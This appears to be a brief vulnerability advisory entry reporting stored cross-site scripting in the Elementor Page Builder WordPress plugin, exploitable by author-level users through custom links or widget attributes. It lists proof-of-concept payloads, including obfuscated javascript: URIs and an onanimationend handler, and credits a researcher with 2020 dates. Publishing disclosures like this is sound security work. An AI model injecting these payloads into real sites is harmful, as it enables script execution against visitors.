The Elementor Page Builder plugin is susceptible to stored XSS. An author user can create custom links containing XSS payloads or apply custom attributes to widgets which results in XSS.
javascript:alert(1), JaVaScript:alert(1), javas cript:alert(1) <style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div>
Jeremy Buis
Jeremy Buis
No
2020-06-05 (about 3 years ago)
2020-06-05 (about 3 years ago)
2020-06-06 (about 3 years ago)